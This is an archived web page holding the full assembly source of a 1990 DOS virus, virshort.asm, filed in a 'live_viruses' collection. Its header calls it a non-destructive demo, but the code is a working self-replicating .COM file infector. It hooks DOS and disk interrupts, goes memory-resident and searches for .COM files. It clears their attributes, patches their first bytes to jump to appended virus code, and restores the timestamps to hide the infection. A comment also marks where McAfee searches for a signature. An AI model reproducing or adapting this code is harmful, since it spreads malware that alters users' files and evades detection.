home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Unsorted BBS Collection
/
thegreatunsorted.tar
/
thegreatunsorted
/
live_viruses
/
virus_collections
/
virshort.asm
< prev
next >
Wrap
Assembly Source File
|
1990-02-21
|
11KB
|
596 lines
;*****************************************************************************
; VIRUS DEMO (not destructive)
;-----------------------------------------------------------------------------
len equ 037eh
plen equ 014eh
cplace equ 9800h
;-----------------------------------------------------------------------------
; FIND FIRST FILE
;-----------------------------------------------------------------------------
jmp con
; check if a virusing operation required.
cmp ah,3dh ;open file
je con
cmp ah,0fh ;open file
je con
cmp ah,4bh ;exec!!!
je con
cmp ah,0eh ;select disk
je con
cmp ah,5bh ;create file
je con
cmp ah,16h ;create file
je con
cmp ah,3ch ;create file
je con
cmp ah,41h ;delete file
je con
cmp ah,13h ;delete file
je con
cmp ah,56h ;rename file
je con
cmp ah,17h ;rename file
je con
; end of check
int 6bh
iret
con: push ax
push bx
push cx
push es
push ds
push dx
;----------------------------------------------------------------------------
; cancel this line: put int 6b to int 21 & int 21 to 6b
; put int 6c to int 13 & int 13 to 6c
;----------------------------------------------------------------------------
; swap int 13 with int 6c
mov ax,0
mov ds,ax
push word ptr [01b0h] ; int 6c
push word ptr [01b2h]
push word ptr [004ch] ; int 13
push word ptr [004eh]
pop word ptr [01b2h] ; put int 13 to 6c
pop word ptr [01b0h]
pop word ptr [004eh] ; put int 6c to int 13
pop word ptr [004ch]
;-----------------------------------------------------------------------------
; find first file
;-----------------------------------------------------------------------------
mov ah,1ah
mov dx,cs
mov ds,dx
mov dx,offset buff
int 6bh
mov ah,4eh
mov cx,0
mov dx,cs
mov ds,dx
mov dx,offset fname
int 6bh
jc error1
;----------------------------------------------------------------------------
; CHECK THE TIME OF FILE TO SEE IF IT IS 31*2 SEC
;----------------------------------------------------------------------------
lfnd: mov ax,word ptr buff+16h
and ax,31
cmp ax,31
jne maketim ;if time not 31 make time 31 and continue
; find next .com file
mov ah,4fh
int 6bh
jc error1
jmp lfnd
;
maketim: mov ax,word ptr buff+16h
and ax,65504 ;zero 5 firsty bits
add ax,31
mov word ptr buff+16h,ax ; put the fixed date
; ----------------------------------------------------------------------
; change the file attributes to 0 (against read only flag)
;----------------------------------------------------------------------
mov ax,cs
mov ds,ax
mov ax,4301h
mov cx,0
mov dx,offset buff
add dx,30
int 6bh
; changed attributes to 0
; find file size
;mov ax,word ptr buff+1ah
; open the file
mov ah,3dh
mov al,2
mov dx,cs
mov ds,dx
mov dx,offset buff
add dx,30
int 6bh
jc error1
mov fhandle,ax
;------------------------------------
; close
;-----------------------------------
jmp cont
;-----------------------------------------------------------------------------
; NOT FAR ERROR (here mcafee searches for the string)
;-----------------------------------------------------------------------------
error1: jmp error
;-----------------------------------------------------------------------------
; PUT THE CALL INSTRUCTION CODE IN BUFF
;-----------------------------------------------------------------------------
cont: mov ax,word ptr buff+1ah ; ax=the file size
sub ax,3 ;find the disp for the jump code
mov buff+1,al
mov buff+2,ah
mov ax,00e8h
mov buff,al
;-----------------------------------------------------------------------------
; READ THE 3 FIRST BYTES FROM THE FILE
;-----------------------------------------------------------------------------
mov ah,42h
mov al,0
mov bx,fhandle
mov cx,0
mov dx,0
int 6bh
jc error1
mov ah,3fh
mov dx,cs
mov ds,dx
mov dx,offset buff
add dx,3
mov bx,fhandle
mov cx,3
int 6bh
jc error1
cmp ax,cx
jl error1
;-----------------------------------------------------------------------------
; MOVE 3 BYTES FROM BUFF+3 TO dat1-3
;-----------------------------------------------------------------------------
mov al,buff+3
mov dat1,al
mov al,buff+4
mov dat2,al
mov al,buff+5
mov dat3,al
;-----------------------------------------------------------------------------
; WRITE THE JMP INSTRUCTION TO THE DISK
;-----------------------------------------------------------------------------
mov ah,42h
mov al,0
mov bx,fhandle
mov cx,0
mov dx,0
int 6bh
jc error1
mov ah,40h
mov dx,cs
mov ds,dx
mov dx,offset buff
mov bx,fhandle
mov cx,3
int 6bh
jc error1
cmp ax,3
jne error
;-----------------------------------------------------------------------------
; CALCULATE THE START ADDRESS OF THE VIRUS DATA ITSELF
;-----------------------------------------------------------------------------
mov ax,word ptr buff+1ah
add ax,100h
add ax,plen
mov sdat1,al
mov sdat1+1,ah
;-----------------------------------------------------------------------------
; WRITE THE VIRUS PREFIX TO DISK
;-----------------------------------------------------------------------------
mov ah,42h
mov al,2
mov bx,fhandle
mov cx,0
mov dx,0
int 6bh
jc error
mov ah,40h
mov dx,cs
mov ds,dx
mov dx,offset data
mov bx,fhandle
mov cx,plen
int 6bh
jc error
cmp ax,plen
jne error
;----------------------------------------------------------------------------
;
;----------------------------------------------------------------------------
mov ah,40h
mov dx,cs
mov ds,dx
mov dx,0100h
mov bx,fhandle
mov cx,len
int 6bh
jc error
cmp ax,len
jne error
;-----------------------------------------------------------------------------
; set old date again + fixed time
;-----------------------------------------------------------------------------
mov ah,57h
mov al,01h
mov bx,fhandle
mov cx,word ptr buff+16h
mov dx,word ptr buff+18h
int 6bh
;----------------------------------------------------------------------------
; put the old attributes back
;----------------------------------------------------------------------------
mov ax,cs
mov ds,ax
mov ax,4301h
mov cl,byte ptr buff+15h
mov ch,0
mov dx,offset buff
add dx,30
int 6bh
;-----------------------------------------------------------------------------
; CLOSE FILE
;-----------------------------------------------------------------------------
error: mov ah,3eh
mov bx,fhandle
int 6bh
;-----------------------------------------------------------------------------
; swap back int 13 with int 6c
mov ax,0
mov ds,ax
push word ptr [01b0h] ; int 6c
push word ptr [01b2h]
push word ptr [004ch] ; int 13
push word ptr [004eh]
pop word ptr [01b2h] ; put int 13 to 6c
pop word ptr [01b0h]
pop word ptr [004eh] ; put int 6c to int 13
pop word ptr [004ch]
;-----------------------------------------------------------------------------
pop dx
pop ds
pop es
pop cx
pop bx
pop ax
int 6bh
iret
;*****************************************************************************
; DATA SECTION
;-----------------------------------------------------------------------------
buff db 43 dup (0)
fname db "*.COM",0
fhandle dw ?
data db 198,6,0,1
dat1 db 0
datb db 198,6,1,1
dat2 db 0
datc db 198,6,2,1
dat3 db 0
pop bx ;change the call data to 100h
mov bx,100h
push bx
; push all registeres
push ax
push dx
push ds
;-----------------------------------------------------------------------------
; check if virus is already in MEMORY
; if it is, use the one in memory
;-----------------------------------------------------------------------------
mov ax,0
mov ds,ax
mov ax,[01ach]
cmp ax,0
jne ggo00
; find cplace and push it
mov ax,0
mov ds,ax
mov ax,[413h]
mov bx,40h
mul bx
sub ax,867h
mov cx,ax
push cx
;
mov cx,len
source db 190 ;MOV SI,OFFSET SOURCE
sdat1 db 0,0
mov di,100h
push cs
pop ds
pop es ;cplace-> now 9800h
cld
rep movsb
;------------------------------------------------------------------------------
; put int 21 => int 6b & int 13 => int 6c
;------------------------------------------------------------------------------
mov ax,3000h
int 21h ; make sure int 21 is not yet hooked !!!!!!
d20: mov si,00bah
cmp al,2h
je didit
cmp ax,0003h
jbe didit
d30: mov si,00b6h
didit: mov ax,0
mov ds,ax
mov ax,[si]
mov ds,ax
mov si,0000h
fnd: mov al,2eh
mov ah,80h
cmp al,[si]
jne do33
mov al,3ah
cmp al,[si+1]
jne do33
mov al,26h
cmp al,[si+2]
jne do33
mov al,0dh
cmp al,[si+4]
je found
jmp do33
;-----------------------------------------
; bridge for far jump
ggo00: jmp ggo
;----------------------------------------
do33: cmp ah,[si]
jne nohing
mov ah,0fch
cmp ah,[si+1]
jne nohing
mov ah,4bh
cmp ah,[si+2]
jne nohing
mov ah,5h
cmp ah,[si+4]
je found
nohing: inc si
cmp si,0fffch
jne fnd
; hook to int 21 (there is no another choice)
mov dx,0
mov ds,dx
push word ptr [84h]
pop word ptr [1ach] ; put int 21 to int 6b
push word ptr [86h]
pop word ptr [1aeh] ; put int 21 to int 6b
jmp ft13
; end of hook
found: push ds
mov ax,0
mov ds,ax
pop [01aeh] ; data seg of int 6b
push si
pop [01ach] ; offset of int 6b
;-----------------------------------------------------------------------------
;----------------------------------------------------------------------------
; find int 13h
;
ft13: mov si,0
mov ds,si
mov ax,3000h
int 21h
mov cx,0c800h
mov bx,215dh
mov [004ch],bx
mov [004eh],cx
cmp al,2
je hooked
mov ax,[003eh]
mov ds,ax
mov ax,0a32eh
mov bx,809ch
mov cl,2eh
fnd13: cmp [si],al
jne loko
cmp ah,[si+1]
jne loko
cmp bl,[si+4]
jne loko
cmp bh,[si+5]
je put13
cmp cl,[si+5]
je put13
loko: inc si
cmp si,0fffch
jne fnd13
;put int 13 to int 6c
mov dx,0
mov ds,dx
push word ptr [004ch]
pop word ptr [01b0h]
push word ptr [004eh]
pop word ptr [01b2h]
jmp hooked
;end of hook
put13: push ds
mov ax,0
mov ds,ax
pop [01b2h]
mov [01b0h],si
;------------------------------------------------------------------------
; HOOK THE VIRUS TO INT 21
;------------------------------------------------------------------------
; hook the virus
hooked: mov ax,102h
mov [84h],ax
mov [86h],es ;put cplace
;-----------------------------------------------------------------------
;
;-----------------------------------------------------------------------
ggo: mov ah,0fh
int 21h
; pop all registeres
pop ds
pop dx
pop ax
ret